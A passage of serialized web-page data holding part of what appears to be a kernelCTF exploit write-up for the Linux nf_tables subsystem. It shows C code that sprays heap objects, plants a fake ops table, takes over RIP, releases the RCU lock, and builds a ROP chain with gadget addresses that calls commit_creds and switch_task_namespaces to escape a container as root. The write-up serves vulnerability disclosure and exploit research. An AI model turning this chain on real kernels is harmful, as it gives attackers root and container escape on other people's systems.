0x39];\n",{"type":26,"tag":137,"props":58812,"children":58813},{"class":5559,"line":5745},[58814,58818,58822,58826,58830,58834,58838,58842],{"type":26,"tag":137,"props":58815,"children":58816},{"style":5584},[58817],{"type":32,"value":58771},{"type":26,"tag":137,"props":58819,"children":58820},{"style":5601},[58821],{"type":32,"value":3016},{"type":26,"tag":137,"props":58823,"children":58824},{"style":5626},[58825],{"type":32,"value":277},{"type":26,"tag":137,"props":58827,"children":58828},{"style":5601},[58829],{"type":32,"value":11247},{"type":26,"tag":137,"props":58831,"children":58832},{"style":5590},[58833],{"type":32,"value":289},{"type":26,"tag":137,"props":58835,"children":58836},{"style":5601},[58837],{"type":32,"value":58792},{"type":26,"tag":137,"props":58839,"children":58840},{"style":5590},[58841],{"type":32,"value":356},{"type":26,"tag":137,"props":58843,"children":58844},{"style":5601},[58845],{"type":32,"value":58846}," NFT_CT_EXPECT_OBJ_TYPE;\n",{"type":26,"tag":137,"props":58848,"children":58849},{"class":5559,"line":5850},[58850],{"type":26,"tag":137,"props":58851,"children":58852},{"style":5601},[58853],{"type":32,"value":12908},{"type":26,"tag":137,"props":58855,"children":58856},{"class":5559,"line":5878},[58857],{"type":26,"tag":137,"props":58858,"children":58859},{"style":5601},[58860],{"type":32,"value":58861},"    // Send ROP in object udata\n",{"type":26,"tag":137,"props":58863,"children":58864},{"class":5559,"line":5891},[58865,58870,58874,58879,58884,58889],{"type":26,"tag":137,"props":58866,"children":58867},{"style":5601},[58868],{"type":32,"value":58869},"    del_obj(",{"type":26,"tag":137,"props":58871,"children":58872},{"style":6009},[58873],{"type":32,"value":56893},{"type":26,"tag":137,"props":58875,"children":58876},{"style":5601},[58877],{"type":32,"value":58878},", \"",{"type":26,"tag":137,"props":58880,"children":58881},{"style":6009},[58882],{"type":32,"value":58883},"spray",{"type":26,"tag":137,"props":58885,"children":58886},{"style":5601},[58887],{"type":32,"value":58888},"-0",{"type":26,"tag":137,"props":58890,"children":58891},{"style":6837},[58892],{"type":32,"value":58893},"\");\n",{"type":26,"tag":137,"props":58895,"children":58896},{"class":5559,"line":5909},[58897],{"type":26,"tag":137,"props":58898,"children":58899},{"style":6837},[58900],{"type":32,"value":58901},"    wait_destroyer();\n",{"type":26,"tag":137,"props":58903,"children":58904},{"class":5559,"line":5930},[58905],{"type":26,"tag":137,"props":58906,"children":58907},{"style":6837},[58908],{"type":32,"value":58909},"    obj_spray(nl, 1, 1, rop, 0xb8);\n",{"type":26,"tag":137,"props":58911,"children":58912},{"class":5559,"line":5939},[58913,58918,58922,58927],{"type":26,"tag":137,"props":58914,"children":58915},{"style":6837},[58916],{"type":32,"value":58917},"    fake_obj = (uint64_t *)getudata(nl, \"",{"type":26,"tag":137,"props":58919,"children":58920},{"style":5573},[58921],{"type":32,"value":58883},{"type":26,"tag":137,"props":58923,"children":58924},{"style":5601},[58925],{"type":32,"value":58926},"-3",{"type":26,"tag":137,"props":58928,"children":58929},{"style":6837},[58930],{"type":32,"value":58893},{"type":26,"tag":137,"props":58932,"children":58933},{"class":5559,"line":6191},[58934],{"type":26,"tag":137,"props":58935,"children":58936},{"style":6837},[58937],{"type":32,"value":58938},"    DumpHex(fake_obj, 0xe8);\n",{"type":26,"tag":137,"props":58940,"children":58941},{"class":5559,"line":6208},[58942],{"type":26,"tag":137,"props":58943,"children":58944},{"style":6837},[58945],{"type":32,"value":58946},"    uint64_t rop_addr = fake_obj[9]; // udata ptr\n",{"type":26,"tag":137,"props":58948,"children":58949},{"class":5559,"line":6225},[58950,58955,58959,58963,58967,58972,58977,58982,58986,58991,58996,59001,59005],{"type":26,"tag":137,"props":58951,"children":58952},{"style":6837},[58953],{"type":32,"value":58954},"    printf(\"",{"type":26,"tag":137,"props":58956,"children":58957},{"style":5601},[58958],{"type":32,"value":3016},{"type":26,"tag":137,"props":58960,"children":58961},{"style":5590},[58962],{"type":32,"value":7152},{"type":26,"tag":137,"props":58964,"children":58965},{"style":5601},[58966],{"type":32,"value":11247},{"type":26,"tag":137,"props":58968,"children":58969},{"style":6009},[58970],{"type":32,"value":58971},"ROP",{"type":26,"tag":137,"props":58973,"children":58974},{"style":6009},[58975],{"type":32,"value":58976}," addr",{"type":26,"tag":137,"props":58978,"children":58979},{"style":5601},[58980],{"type":32,"value":58981},": 0",{"type":26,"tag":137,"props":58983,"children":58984},{"style":6009},[58985],{"type":32,"value":173},{"type":26,"tag":137,"props":58987,"children":58988},{"style":5601},[58989],{"type":32,"value":58990},"%",{"type":26,"tag":137,"props":58992,"children":58993},{"style":6009},[58994],{"type":32,"value":58995},"lx",{"type":26,"tag":137,"props":58997,"children":58998},{"style":5601},[58999],{"type":32,"value":59000},"\\",{"type":26,"tag":137,"props":59002,"children":59003},{"style":6009},[59004],{"type":32,"value":1549},{"type":26,"tag":137,"props":59006,"children":59007},{"style":6837},[59008],{"type":32,"value":59009},"\", rop_addr);\n",{"type":26,"tag":137,"props":59011,"children":59012},{"class":5559,"line":6238},[59013],{"type":26,"tag":137,"props":59014,"children":59015},{"emptyLinePlaceholder":18},[59016],{"type":32,"value":6276},{"type":26,"tag":137,"props":59018,"children":59019},{"class":5559,"line":6247},[59020],{"type":26,"tag":137,"props":59021,"children":59022},{"style":6837},[59023],{"type":32,"value":59024},"    // Point to fake ops\n",{"type":26,"tag":137,"props":59026,"children":59027},{"class":5559,"line":6270},[59028],{"type":26,"tag":137,"props":59029,"children":59030},{"style":6837},[59031],{"type":32,"value":59032},"    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n",{"type":26,"tag":137,"props":59034,"children":59035},{"class":5559,"line":6279},[59036],{"type":26,"tag":137,"props":59037,"children":59038},{"style":6837},[59039],{"type":32,"value":12908},{"type":26,"tag":137,"props":59041,"children":59042},{"class":5559,"line":6288},[59043],{"type":26,"tag":137,"props":59044,"children":59045},{"style":6837},[59046],{"type":32,"value":59047},"    // Write ROP\n",{"type":26,"tag":137,"props":59049,"children":59050},{"class":5559,"line":6355},[59051,59056,59060,59064,59068,59073,59078],{"type":26,"tag":137,"props":59052,"children":59053},{"style":6837},[59054],{"type":32,"value":59055},"    puts(\"",{"type":26,"tag":137,"props":59057,"children":59058},{"style":5601},[59059],{"type":32,"value":3016},{"type":26,"tag":137,"props":59061,"children":59062},{"style":5590},[59063],{"type":32,"value":7152},{"type":26,"tag":137,"props":59065,"children":59066},{"style":5601},[59067],{"type":32,"value":11247},{"type":26,"tag":137,"props":59069,"children":59070},{"style":6009},[59071],{"type":32,"value":59072},"Write",{"type":26,"tag":137,"props":59074,"children":59075},{"style":6009},[59076],{"type":32,"value":59077}," ROP",{"type":26,"tag":137,"props":59079,"children":59080},{"style":6837},[59081],{"type":32,"value":58893},{"type":26,"tag":137,"props":59083,"children":59084},{"class":5559,"line":6363},[59085],{"type":26,"tag":137,"props":59086,"children":59087},{"style":6837},[59088],{"type":32,"value":59089},"    deludata_spray(nl, 3, 1);\n",{"type":26,"tag":137,"props":59091,"children":59092},{"class":5559,"line":6393},[59093],{"type":26,"tag":137,"props":59094,"children":59095},{"style":6837},[59096],{"type":32,"value":58901},{"type":26,"tag":137,"props":59098,"children":59099},{"class":5559,"line":6401},[59100],{"type":26,"tag":137,"props":59101,"children":59102},{"style":6837},[59103],{"type":32,"value":59104},"    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n",{"type":26,"tag":137,"props":59106,"children":59107},{"class":5559,"line":6433},[59108],{"type":26,"tag":137,"props":59109,"children":59110},{"emptyLinePlaceholder":18},[59111],{"type":32,"value":6276},{"type":26,"tag":137,"props":59113,"children":59114},{"class":5559,"line":6441},[59115],{"type":26,"tag":137,"props":59116,"children":59117},{"style":6837},[59118],{"type":32,"value":59119},"    // Takeover RIP\n",{"type":26,"tag":137,"props":59121,"children":59122},{"class":5559,"line":6501},[59123,59127,59131,59135,59139,59144,59149],{"type":26,"tag":137,"props":59124,"children":59125},{"style":6837},[59126],{"type":32,"value":59055},{"type":26,"tag":137,"props":59128,"children":59129},{"style":5601},[59130],{"type":32,"value":3016},{"type":26,"tag":137,"props":59132,"children":59133},{"style":5590},[59134],{"type":32,"value":7152},{"type":26,"tag":137,"props":59136,"children":59137},{"style":5601},[59138],{"type":32,"value":11247},{"type":26,"tag":137,"props":59140,"children":59141},{"style":6009},[59142],{"type":32,"value":59143},"Takeover",{"type":26,"tag":137,"props":59145,"children":59146},{"style":6009},[59147],{"type":32,"value":59148}," RIP",{"type":26,"tag":137,"props":59150,"children":59151},{"style":6837},[59152],{"type":32,"value":58893},{"type":26,"tag":137,"props":59154,"children":59155},{"class":5559,"line":11634},[59156,59161,59165,59170],{"type":26,"tag":137,"props":59157,"children":59158},{"style":6837},[59159],{"type":32,"value":59160},"    dump_obj(nl, \"",{"type":26,"tag":137,"props":59162,"children":59163},{"style":5573},[59164],{"type":32,"value":58883},{"type":26,"tag":137,"props":59166,"children":59167},{"style":5601},[59168],{"type":32,"value":59169},"-1",{"type":26,"tag":137,"props":59171,"children":59172},{"style":6837},[59173],{"type":32,"value":58893},{"type":26,"tag":137,"props":59175,"children":59176},{"class":5559,"line":11652},[59177],{"type":26,"tag":137,"props":59178,"children":59179},{"style":6837},[59180],{"type":32,"value":12908},{"type":26,"tag":118,"props":59182,"children":59184},{"id":59183},"bypass-context-switch-in-rcu-critical-section",[59185],{"type":32,"value":59186},"Bypass context switch in RCU critical-section",{"type":26,"tag":35,"props":59188,"children":59189},{},[59190,59191,59196],{"type":32,"value":19206},{"type":26,"tag":130,"props":59192,"children":59194},{"className":59193},[],[59195],{"type":32,"value":57716},{"type":32,"value":59197}," operations are invoked from an RCU critical-section, which can be a problem for ROPing since we want to switch contexts to userland after executing our payload, which is illegal in RCU critical-sections.",{"type":26,"tag":35,"props":59199,"children":59200},{},[59201,59203,59210,59212,59218,59220,59226],{"type":32,"value":59202},"A workaround has been discussed before by D3v17 in a ",{"type":26,"tag":41,"props":59204,"children":59207},{"href":59205,"rel":59206},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md#post-rip",[45],[59208],{"type":32,"value":59209},"previous kernelCTF submission",{"type":32,"value":59211}," that basically consists in using memory write gadgets to overwrite the RCU lock in our ",{"type":26,"tag":130,"props":59213,"children":59215},{"className":59214},[],[59216],{"type":32,"value":59217},"task_struct",{"type":32,"value":59219}," before switching to userland. Although this works, I struggled to find useful gadgets but ended up coming up with an easier solution. There are kernel APIs specifically meant for acquiring/releasing the RCU lock, so we should be able to simply call ",{"type":26,"tag":130,"props":59221,"children":59223},{"className":59222},[],[59224],{"type":32,"value":59225},"__rcu_read_unlock()",{"type":32,"value":59227}," function and exit the RCU critical-section before switching contexts.",{"type":26,"tag":5512,"props":59229,"children":59231},{"className":31704,"code":59230,"language":31706,"meta":7,"style":7},"    // ROP stage 1\n    int pos = 3;\n\n    rop[pos++] = kaslr_slide + __RCU_READ_UNLOCK;\n",[59232],{"type":26,"tag":130,"props":59233,"children":59234},{"__ignoreMap":7},[59235,59243,59267,59274],{"type":26,"tag":137,"props":59236,"children":59237},{"class":5559,"line":5560},[59238],{"type":26,"tag":137,"props":59239,"children":59240},{"style":5564},[59241],{"type":32,"value":59242},"    // ROP stage 1\n",{"type":26,"tag":137,"props":59244,"children":59245},{"class":5559,"line":5412},[59246,59250,59255,59259,59263],{"type":26,"tag":137,"props":59247,"children":59248},{"style":5573},[59249],{"type":32,"value":21670},{"type":26,"tag":137,"props":59251,"children":59252},{"style":5601},[59253],{"type":32,"value":59254}," pos ",{"type":26,"tag":137,"props":59256,"children":59257},{"style":5590},[59258],{"type":32,"value":289},{"type":26,"tag":137,"props":59260,"children":59261},{"style":5626},[59262],{"type":32,"value":21692},{"type":26,"tag":137,"props":59264,"children":59265},{"style":5601},[59266],{"type":32,"value":5604},{"type":26,"tag":137,"props":59268,"children":59269},{"class":5559,"line":5417},[59270],{"type":26,"tag":137,"props":59271,"children":59272},{"emptyLinePlaceholder":18},[59273],{"type":32,"value":6276},{"type":26,"tag":137,"props":59275,"children":59276},{"class":5559,"line":5642},[59277,59281,59286,59290,59294,59298,59302,59306],{"type":26,"tag":137,"props":59278,"children":59279},{"style":5584},[59280],{"type":32,"value":58771},{"type":26,"tag":137,"props":59282,"children":59283},{"style":5601},[59284],{"type":32,"value":59285},"[pos",{"type":26,"tag":137,"props":59287,"children":59288},{"style":5590},[59289],{"type":32,"value":53872},{"type":26,"tag":137,"props":59291,"children":59292},{"style":5601},[59293],{"type":32,"value":11247},{"type":26,"tag":137,"props":59295,"children":59296},{"style":5590},[59297],{"type":32,"value":289},{"type":26,"tag":137,"props":59299,"children":59300},{"style":5601},[59301],{"type":32,"value":58792},{"type":26,"tag":137,"props":59303,"children":59304},{"style":5590},[59305],{"type":32,"value":356},{"type":26,"tag":137,"props":59307,"children":59308},{"style":5601},[59309],{"type":32,"value":59310}," __RCU_READ_UNLOCK;\n",{"type":26,"tag":118,"props":59312,"children":59314},{"id":59313},"rop",[59315],{"type":32,"value":58971},{"type":26,"tag":35,"props":59317,"children":59318},{},[59319],{"type":32,"value":59320},"Most of the ROP chain to escape the container as root is business as usual:",{"type":26,"tag":3426,"props":59322,"children":59323},{},[59324,59335,59346],{"type":26,"tag":3430,"props":59325,"children":59326},{},[59327,59333],{"type":26,"tag":130,"props":59328,"children":59330},{"className":59329},[],[59331],{"type":32,"value":59332},"commit_creds(&init_cred);",{"type":32,"value":59334}," Commit root credentials to our process",{"type":26,"tag":3430,"props":59336,"children":59337},{},[59338,59344],{"type":26,"tag":130,"props":59339,"children":59341},{"className":59340},[],[59342],{"type":32,"value":59343},"task = find_task_by_vpid(1);",{"type":32,"value":59345}," Find the root process of our namespace",{"type":26,"tag":3430,"props":59347,"children":59348},{},[59349,59355],{"type":26,"tag":130,"props":59350,"children":59352},{"className":59351},[],[59353],{"type":32,"value":59354},"switch_task_namespaces(task, &init_nsproxy);",{"type":32,"value":59356}," Move it to the root namespace",{"type":26,"tag":35,"props":59358,"children":59359},{},[59360,59362,59368,59370,59376,59378,59384,59386,59392,59394,59399,59401,59407],{"type":32,"value":59361},"However, I had a hard time finding gadgets to easily move the return value of ",{"type":26,"tag":130,"props":59363,"children":59365},{"className":59364},[],[59366],{"type":32,"value":59367},"find_task_by_vpid(1)",{"type":32,"value":59369}," passed through ",{"type":26,"tag":130,"props":59371,"children":59373},{"className":59372},[],[59374],{"type":32,"value":59375},"rax",{"type":32,"value":59377}," to ",{"type":26,"tag":130,"props":59379,"children":59381},{"className":59380},[],[59382],{"type":32,"value":59383},"rdi",{"type":32,"value":59385},". What I ended up going with was a ",{"type":26,"tag":130,"props":59387,"children":59389},{"className":59388},[],[59390],{"type":32,"value":59391},"push rax; jmp qword ptr [rsi + 0x66]; ret",{"type":32,"value":59393}," gadget, that allowed me to push the ",{"type":26,"tag":130,"props":59395,"children":59397},{"className":59396},[],[59398],{"type":32,"value":59375},{"type":32,"value":59400}," value onto the stack and then jump to a controlled location, where I stored a ",{"type":26,"tag":130,"props":59402,"children":59404},{"className":59403},[],[59405],{"type":32,"value":59406},"pop rdi; ret",{"type":32,"value":59408}," gadget to consume the new stack value and restore normal ROP execution. This very minor detour in the ROP flow looks like this:",{"type":26,"tag":3426,"props":59410,"children":59411},{},[59412,59417,59430],{"type":26,"tag":3430,"props":59413,"children":59414},{},[59415],{"type":32,"value":59416},"We push the value onto the stack (stack pointer regresses)",{"type":26,"tag":3430,"props":59418,"children":59419},{},[59420,59422,59428],{"type":32,"value":59421},"We jump to our \"trampoline\" gadget (",{"type":26,"tag":130,"props":59423,"children":59425},{"className":59424},[],[59426],{"type":32,"value":59427},"pop rdi; ret;",{"type":32,"value":59429}," location)",{"type":26,"tag":3430,"props":59431,"children":59432},{},[59433,59438],{"type":26,"tag":130,"props":59434,"children":59436},{"className":59435},[],[59437],{"type":32,"value":59406},{"type":32,"value":59439}," consumes the value from the stack (progressing the stack pointer back to where it should be), and then we bounce back to the next gadget",{"type":26,"tag":5512,"props":59441,"children":59443},{"className":31704,"code":59442,"language":31706,"meta":7,"style":7},"[...]\n    // commit_creds(&init_cred);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = kaslr_slide + INIT_CRED;\n    rop[pos++] = kaslr_slide + COMMIT_CREDS;\n\n    // task = find_task_by_vpid(1);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = 1;\n    rop[pos++] = kaslr_slide + FIND_TASK_BY_VPID;\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = obj_ptr + 0xe0 - 0x66;            // rax -> rdi and resume rop\n    rop[pos++] = kaslr_slide + 0xffffffff81caed31; // push rax; jmp qword ptr [rsi + 0x66];\n\n    // switch_task_namespaces(task, &init_nsproxy);\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = kaslr_slide + INIT_NSPROXY;\n    rop[pos++] = kaslr_slide + SWITCH_TASK_NAMESPACES;\n[...]\n",[59444],{"type":26,"tag":130,"props":59445,"children":59446},{"__ignoreMap":7},[59447,59454,59471,59516,59552,59588,59595,59603,59646,59677,59713,59758,59813,59858,59865,59873,59916,59952,59988],{"type":26,"tag":137,"props":59448,"children":59449},{"class":5559,"line":5560},[59450],{"type":26,"tag":137,"props":59451,"children":59452},{"style":5601},[59453],{"type":32,"value":12908},{"type":26,"tag":137,"props":59455,"children":59456},{"class":5559,"line":5412},[59457,59462,59467],{"type":26,"tag":137,"props":59458,"children":59459},{"style":5601},[59460],{"type":32,"value":59461},"    // commit_creds(&",{"type":26,"tag":137,"props":59463,"children":59464},{"style":5584},[59465],{"type":32,"value":59466},"init_cred",{"type":26,"tag":137,"props":59468,"children":59469},{"style":5601},[59470],{"type":32,"value":6430},{"type":26,"tag":137,"props":59472,"children":59473},{"class":5559,"line":5417},[59474,59478,59482,59486,59490,59494,59498,59502,59507,59511],{"type":26,"tag":137,"props":59475,"children":59476},{"style":5584},[59477],{"type":32,"value":58771},{"type":26,"tag":137,"props":59479,"children":59480},{"style":5601},[59481],{"type":32,"value":59285},{"type":26,"tag":137,"props":59483,"children":59484},{"style":5590},[59485],{"type":32,"value":53872},{"type":26,"tag":137,"props":59487,"children":59488},{"style":5601},[59489],{"type":32,"value":11247},{"type":26,"tag":137,"props":59491,"children":59492},{"style":5590},[59493],{"type":32,"value":289},{"type":26,"tag":137,"props":59495,"children":59496},{"style":5601},[59497],{"type":32,"value":58792},{"type":26,"tag":137,"props":59499,"children":59500},{"style":5590},[59501],{"type":32,"value":356},{"type":26,"tag":137,"props":59503,"children":59504},{"style":5626},[59505],{"type":32,"value":59506}," 0xffffffff8112c7c0",{"type":26,"tag":137,"props":59508,"children":59509},{"style":5601},[59510],{"type":32,"value":51676},{"type":26,"tag":137,"props":59512,"children":59513},{"style":5564},[59514],{"type":32,"value":59515}," // pop rdi; ret;\n",{"type":26,"tag":137,"props":59517,"children":59518},{"class":5559,"line":5642},[59519,59523,59527,59531,59535,59539,59543,59547],{"type":26,"tag":137,"props":59520,"children":59521},{"style":5584},[59522],{"type":32,"value":58771},{"type":26,"tag":137,"props":59524,"children":59525},{"style":5601},[59526],{"type":32,"value":59285},{"type":26,"tag":137,"props":59528,"children":59529},{"style":5590},[59530],{"type":32,"value":53872},{"type":26,"tag":137,"props":59532,"children":59533},{"style":5601},[59534],{"type":32,"value":11247},{"type":26,"tag":137,"props":59536,"children":59537},{"style":5590},[59538],{"type":32,"value":289},{"type":26,"tag":137,"props":59540,"children":59541},{"style":5601},[59542],{"type":32,"value":58792},{"type":26,"tag":137,"props":59544,"children":59545},{"style":5590},[59546],{"type":32,"value":356},{"type":26,"tag":137,"props":59548,"children":59549},{"style":5601},[59550],{"type":32,"value":59551}," INIT_CRED;\n",{"type":26,"tag":137,"props":59553,"children":59554},{"class":5559,"line":5745},[59555,59559,59563,59567,59571,59575,59579,59583],{"type":26,"tag":137,"props":59556,"children":59557},{"style":5584},[59558],{"type":32,"value":58771},{"type":26,"tag":137,"props":59560,"children":59561},{"style":5601},[59562],{"type":32,"value":59285},{"type":26,"tag":137,"props":59564,"children":59565},{"style":5590},[59566],{"type":32,"value":53872},{"type":26,"tag":137,"props":59568,"children":59569},{"style":5601},[59570],{"type":32,"value":11247},{"type":26,"tag":137,"props":59572,"children":59573},{"style":5590},[59574],{"type":32,"value":289},{"type":26,"tag":137,"props":59576,"children":59577},{"style":5601},[59578],{"type":32,"value":58792},{"type":26,"tag":137,"props":59580,"children":59581},{"style":5590},[59582],{"type":32,"value":356},{"type":26,"tag":137,"props":59584,"children":59585},{"style":5601},[59586],{"type":32,"value":59587}," COMMIT_CREDS;\n",{"type":26,"tag":137,"props":59589,"children":59590},{"class":5559,"line":5850},[59591],{"type":26,"tag":137,"props":59592,"children":59593},{"emptyLinePlaceholder":18},[59594],{"type":32,"value":6276},{"type":26,"tag":137,"props":59596,"children":59597},{"class":5559,"line":5878},[59598],{"type":26,"tag":137,"props":59599,"children":59600},{"style":5564},[59601],{"type":32,"value":59602},"    // task = find_task_by_vpid(1);\n",{"type":26,"tag":137,"props":59604,"children":59605},{"class":5559,"line":5891},[59606,59610,59614,59618,59622,59626,59630,59634,59638,59642],{"type":26,"tag":137,"props":59607,"children":59608},{"style":5584},[59609],{"type":32,"value":58771},{"type":26,"tag":137,"props":59611,"children":59612},{"style":5601},[59613],{"type":32,"value":59285},{"type":26,"tag":137,"props":59615,"children":59616},{"style":5590},[59617],{"type":32,"value":53872},{"type":26,"tag":137,"props":59619,"children":59620},{"style":5601},[59621],{"type":32,"value":11247},{"type":26,"tag":137,"props":59623,"children":59624},{"style":5590},[59625],{"type":32,"value":289},{"type":26,"tag":137,"props":59627,"children":59628},{"style":5601},[59629],{"type":32,"value":58792},{"type":26,"tag":137,"props":59631,"children":59632},{"style":5590},[59633],{"type":32,"value":356},{"type":26,"tag":137,"props":59635,"children":59636},{"style":5626},[59637],{"type":32,"value":59506},{"type":26,"tag":137,"props":59639,"children":59640},{"style":5601},[59641],{"type":32,"value":51676},{"type":26,"tag":137,"props":59643,"children":59644},{"style":5564},[59645],{"type":32,"value":59515},{"type":26,"tag":137,"props":59647,"children":59648},{"class":5559,"line":5909},[59649,59653,59657,59661,59665,59669,59673],{"type":26,"tag":137,"props":59650,"children":59651},{"style":5584},[59652],{"type":32,"value":58771},{"type":26,"tag":137,"props":59654,"children":59655},{"style":5601},[59656],{"type":32,"value":59285},{"type":26,"tag":137,"props":59658,"children":59659},{"style":5590},[59660],{"type":32,"value":53872},{"type":26,"tag":137,"props":59662,"children":59663},{"style":5601},[59664],{"type":32,"value":11247},{"type":26,"tag":137,"props":59666,"children":59667},{"style":5590},[59668],{"type":32,"value":289},{"type":26,"tag":137,"props":59670,"children":59671},{"style":5626},[59672],{"type":32,"value":7104},{"type":26,"tag":137,"props":59674,"children":59675},{"style":5601},[59676],{"type":32,"value":5604},{"type":26,"tag":137,"props":59678,"children":59679},{"class":5559,"line":5930},[59680,59684,59688,59692,59696,59700,59704,59708],{"type":26,"tag":137,"props":59681,"children":59682},{"style":5584},[59683],{"type":32,"value":58771},{"type":26,"tag":137,"props":59685,"children":59686},{"style":5601},[59687],{"type":32,"value":59285},{"type":26,"tag":137,"props":59689,"children":59690},{"style":5590},[59691],{"type":32,"value":53872},{"type":26,"tag":137,"props":59693,"children":59694},{"style":5601},[59695],{"type":32,"value":11247},{"type":26,"tag":137,"props":59697,"children":59698},{"style":5590},[59699],{"type":32,"value":289},{"type":26,"tag":137,"props":59701,"children":59702},{"style":5601},[59703],{"type":32,"value":58792},{"type":26,"tag":137,"props":59705,"children":59706},{"style":5590},[59707],{"type":32,"value":356},{"type":26,"tag":137,"props":59709,"children":59710},{"style":5601},[59711],{"type":32,"value":59712}," FIND_TASK_BY_VPID;\n",{"type":26,"tag":137,"props":59714,"children":59715},{"class":5559,"line":5939},[59716,59720,59724,59728,59732,59736,59740,59744,59749,59753],{"type":26,"tag":137,"props":59717,"children":59718},{"style":5584},[59719],{"type":32,"value":58771},{"type":26,"tag":137,"props":59721,"children":59722},{"style":5601},[59723],{"type":32,"value":59285},{"type":26,"tag":137,"props":59725,"children":59726},{"style":5590},[59727],{"type":32,"value":53872},{"type":26,"tag":137,"props":59729,"children":59730},{"style":5601},[59731],{"type":32,"value":11247},{"type":26,"tag":137,"props":59733,"children":59734},{"style":5590},[59735],{"type":32,"value":289},{"type":26,"tag":137,"props":59737,"children":59738},{"style":5601},[59739],{"type":32,"value":58792},{"type":26,"tag":137,"props":59741,"children":59742},{"style":5590},[59743],{"type":32,"value":356},{"type":26,"tag":137,"props":59745,"children":59746},{"style":5626},[59747],{"type":32,"value":59748}," 0xffffffff8102e2a6",{"type":26,"tag":137,"props":59750,"children":59751},{"style":5601},[59752],{"type":32,"value":51676},{"type":26,"tag":137,"props":59754,"children":59755},{"style":5564},[59756],{"type":32,"value":59757}," // pop rsi; ret;\n",{"type":26,"tag":137,"props":59759,"children":59760},{"class":5559,"line":6191},[59761,59765,59769,59773,59777,59781,59786,59790,59795,59799,59804,59808],{"type":26,"tag":137,"props":59762,"children":59763},{"style":5584},[59764],{"type":32,"value":58771},{"type":26,"tag":137,"props":59766,"children":59767},{"style":5601},[59768],{"type":32,"value":59285},{"type":26,"tag":137,"props":59770,"children":59771},{"style":5590},[59772],{"type":32,"value":53872},{"type":26,"tag":137,"props":59774,"children":59775},{"style":5601},[59776],{"type":32,"value":11247},{"type":26,"tag":137,"props":59778,"children":59779},{"style":5590},[59780],{"type":32,"value":289},{"type":26,"tag":137,"props":59782,"children":59783},{"style":5601},[59784],{"type":32,"value":59785}," obj_ptr ",{"type":26,"tag":137,"props":59787,"children":59788},{"style":5590},[59789],{"type":32,"value":356},{"type":26,"tag":137,"props":59791,"children":59792},{"style":5626},[59793],{"type":32,"value":59794}," 0xe0",{"type":26,"tag":137,"props":59796,"children":59797},{"style":5590},[59798],{"type":32,"value":53858},{"type":26,"tag":137,"props":59800,"children":59801},{"style":5626},[59802],{"type":32,"value":59803}," 0x66",{"type":26,"tag":137,"props":59805,"children":59806},{"style":5601},[59807],{"type":32,"value":51676},{"type":26,"tag":137,"props":59809,"children":59810},{"style":5564},[59811],{"type":32,"value":59812},"            // rax -> rdi and resume rop\n",{"type":26,"tag":137,"props":59814,"children":59815},{"class":5559,"line":6208},[59816,59820,59824,59828,59832,59836,59840,59844,59849,59853],{"type":26,"tag":137,"props":59817,"children":59818},{"style":5584},[59819],{"type":32,"value":58771},{"type":26,"tag":137,"props":59821,"children":59822},{"style":5601},[59823],{"type":32,"value":59285},{"type":26,"tag":137,"props":59825,"children":59826},{"style":5590},[59827],{"type":32,"value":53872},{"type":26,"tag":137,"props":59829,"children":59830},{"style":5601},[59831],{"type":32,"value":11247},{"type":26,"tag":137,"props":59833,"children":59834},{"style":5590},[59835],{"type":32,"value":289},{"type":26,"tag":137,"props":59837,"children":59838},{"style":5601},[59839],{"type":32,"value":58792},{"type":26,"tag":137,"props":59841,"children":59842},{"style":5590},[59843],{"type":32,"value":356},{"type":26,"tag":137,"props":59845,"children":59846},{"style":5626},[59847],{"type":32,"value":59848}," 0xffffffff81caed31",{"type":26,"tag":137,"props":59850,"children":59851},{"style":5601},[59852],{"type":32,"value":51676},{"type":26,"tag":137,"props":59854,"children":59855},{"style":5564},[59856],{"type":32,"value":59857}," // push rax; jmp qword ptr [rsi + 0x66];\n",{"type":26,"tag":137,"props":59859,"children":59860},{"class":5559,"line":6225},[59861],{"type":26,"tag":137,"props":59862,"children":59863},{"emptyLinePlaceholder":18},[59864],{"type":32,"value":6276},{"type":26,"tag":137,"props":59866,"children":59867},{"class":5559,"line":6238},[59868],{"type":26,"tag":137,"props":59869,"children":59870},{"style":5564},[59871],{"type":32,"value":59872},"    // switch_task_namespaces(task, &init_nsproxy);\n",{"type":26,"tag":137,"props":59874,"children":59875},{"class":5559,"line":6247},[59876,59880,59884,59888,59892,59896,59900,59904,59908,59912],{"type":26,"tag":137,"props":59877,"children":59878},{"style":5584},[59879],{"type":32,"value":58771},{"type":26,"tag":137,"props":59881,"children":59882},{"style":5601},[59883],{"type":32,"value":59285},{"type":26,"tag":137,"props":59885,"children":59886},{"style":5590},[59887],{"type":32,"value":53872},{"type":26,"tag":137,"props":59889,"children":59890},{"style":5601},[59891],{"type":32,"value":11247},{"type":26,"tag":137,"props":59893,"children":59894},{"style":5590},[59895],{"type":32,"value":289},{"type":26,"tag":137,"props":59897,"children":59898},{"style":5601},[59899],{"type":32,"value":58792},{"type":26,"tag":137,"props":59901,"children":59902},{"style":5590},[59903],{"type":32,"value":356},{"type":26,"tag":137,"props":59905,"children":59906},{"style":5626},[59907],{"type":32,"value":59748},{"type":26,"tag":137,"props":59909,"children":59910},{"style":5601},[59911],{"type":32,"value":51676},{"type":26,"tag":137,"props":59913,"children":59914},{"style":5564},[59915],{"type":32,"value":59757},{"type":26,"tag":137,"props":59917,"children":59918},{"class":5559,"line":6270},[59919,59923,59927,59931,59935,59939,59943,59947],{"type":26,"tag":137,"props":59920,"children":59921},{"style":5584},[59922],{"type":32,"value":58771},{"type":26,"tag":137,"props":59924,"children":59925},{"style":5601},[59926],{"type":32,"value":59285},{"type":26,"tag":137,"props":59928,"children":59929},{"style":5590},[59930],{"type":32,"value":53872},{"type":26,"tag":137,"props":59932,"children":59933},{"style":5601},[59934],{"type":32,"value":11247},{"type":26,"tag":137,"props":59936,"children":59937},{"style":5590},[59938],{"type":32,"value":289},{"type":26,"tag":137,"props":59940,"children":59941},{"style":5601},[59942],{"type":32,"value":58792},{"type":26,"tag":137,"props":59944,"children":59945},{"style":5590